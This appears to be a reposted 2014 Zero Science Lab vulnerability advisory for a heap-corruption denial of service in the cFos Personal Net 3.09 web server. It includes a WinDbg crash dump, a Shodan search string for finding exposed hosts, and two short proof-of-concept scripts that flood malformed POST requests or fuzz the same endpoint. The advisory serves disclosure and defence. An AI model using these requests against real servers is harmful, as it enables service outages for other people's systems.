首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
cFos Personal Net 3.09 Heap Corruption Denial Of Service
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2014-04-25  
cFos Personal Net v3.09 Remote Heap Memory Corruption Denial of Service


Vendor: cFos Software GmbH
Product web page: https://www.cfos.de
Affected version: 3.09

Summary: cFos Personal Net (PNet) is a full-featured HTTP server intended for
personal and professional use. For personal use, instead of hosting websites
with a webhoster, you just run it on your Windows machine. For professional
use, you rent a virtual windows PC or dedicated PC from a webhoster and run
it there.

Desc: cFos Personal Net web server is vulnerable to a remote denial of service
issue when processing multiple malformed POST requests in less than 3000ms.
The issue occurs when the application fails to handle the data sent in the
POST requests in a single socket connection causing heap memory corruption
which results in a crash of the HTTP service.

SHODAN: cFos Personal Net v3.09 Microsoft-HTTPAPI/2.0

============================================================================

(658.1448): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Module load completed but symbols could not be loaded for cfospnet.exe
eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88
eip=00914529 esp=03b1fb94 ebp=03b1fbb8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
cfospnet+0x54529:
00914529 ff5004          call    dword ptr [eax+4]    ds:002b:feeefef2=????????
0:024> d ecx
02813dcc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813ddc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813dec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813dfc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e0c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e1c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e2c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e3c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0:024> d
02813e4c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e5c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e6c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e7c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e8c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e9c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813eac  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813ebc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0:024> d
02813ecc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813edc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813eec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813efc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813f0c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813f1c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813f2c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813f3c  ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21  .............f.!
0:024> d
02813f4c  8e e8 06 18 d0 71 2d 04-c0 f8 80 02 d0 71 2d 04  .....q-......q-.
02813f5c  01 00 ad ba 5f 43 46 50-4e 45 54 5f 50 41 54 48  ...._CFPNET_PATH
02813f6c  00 f0 ad ba 0c 00 00 00-0f 00 00 00 90 41 2c 04  .............A,.
02813f7c  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 29 00 00 00  ............)...
02813f8c  2f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00  /...............
02813f9c  00 00 00 00 aa 66 9a 38-dc e8 06 00 10 31 2c 04  .....f.8.....1,.
02813fac  d0 0c 81 02 ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813fbc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0:024> d
02813fcc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813fdc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813fec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813ffc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281400c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281401c  ee fe ee fe ee fe ee fe-ee fe ee fe be 66 99 2f  .............f./
0281402c  c6 e8 06 18 0a 00 00 00-6e 00 61 00 6d 00 65 00  ........n.a.m.e.
0281403c  3d 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00  =...............
0:024> d
0281404c  00 00 00 00 b0 66 9a 22-d2 e8 06 00 60 8b 80 02  .....f."....`...
0281405c  10 c9 2b 04 ee fe ee fe-ee fe ee fe ee fe ee fe  ..+.............
0281406c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281407c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281408c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281409c  ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21  .............f.!
028140ac  dc e8 06 18 e8 08 81 02-30 37 86 02 c0 4b 81 02  ........07...K..
028140bc  00 00 ad ba 52 45 51 55-45 53 54 5f 55 52 49 00  ....REQUEST_URI.
0:024> d
028140cc  0d f0 ad ba 0b 00 00 00-0f 00 00 00 08 41 81 02  .............A..
028140dc  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 1d 00 00 00  ................
028140ec  1f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00  ................
028140fc  00 00 00 00 bc 66 99 2d-dc e8 06 18 2f 73 63 72  .....f.-..../scr
0281410c  69 70 74 73 2f 67 65 74-5f 73 65 72 76 65 72 5f  ipts/get_server_
0281411c  73 74 61 74 73 2e 6a 73-73 00 ad ba ab ab ab ab  stats.jss.......
0281412c  ab ab ab ab 00 00 00 00-00 00 00 00 ad 66 9a 3f  .............f.?
0281413c  d0 e8 06 00 c8 4a 2c 04-f0 18 2d 04 ee fe ee fe  .....J,...-.....
0:024> d
0281414c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281415c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281416c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281417c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281418c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281419c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
028141ac  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
028141bc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0:024> d esi
028198b0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198c0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198d0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198e0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198f0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
02819900  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
02819910  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
02819920  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................

============================================================================


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5184
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php


01.04.2014

---


-ALGjlang

 open_socket(); for(j=1;j<=30;j++)
 {
 send_socket("
 POST /scripts/get_server_stats.jss?name= HTTP/1.1
 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
 Accept: */*
 Host: 192.168.0.107
 Content-Length: 20

 AAAAAAAAAAAAAAAAAA\x0d\x0a\x0d\x0a
 ") } close_socket();


-SPKfzz

 s_string("POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n");
 s_string("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n");
 s_string("Accept: */*");
 s_string("Host: 192.168.0.107\r\n");
 s_string("Content-Length: ");
 s_blocksize_string("fuzz",15);
 s_string("\r\n\r\n");

 s_block_start("fuzz");
 s_string("joxypoxyjoxypoxy!!\r\n\" * 100);
 s_string_variable("ZSL");
 s_string("\r\n"); //importante
 s_block_end("fuzz");

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·JRuby Sandbox 0.2.2 Bypass
·Kolibri 2.0 GET Request - Stac
·mRemote Offline Password Decry
·Symantec Endpoint Protection M
·Acunetix 8 Scanner Buffer Over
·Wireshark 1.8.12/1.10.5 wireta
·Acunetix 8 build 20120704 - Re
·Mac OS X NFS Mount Privilege E
·Bonefire v.0.7.1 - Reinstall A
·GeoCore MAX DB 7.3.3 Blind SQL
·No-CMS 0.6.6 rev 1 - Admin Acc
·InfraRecorder 0.53 Unicode Buf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved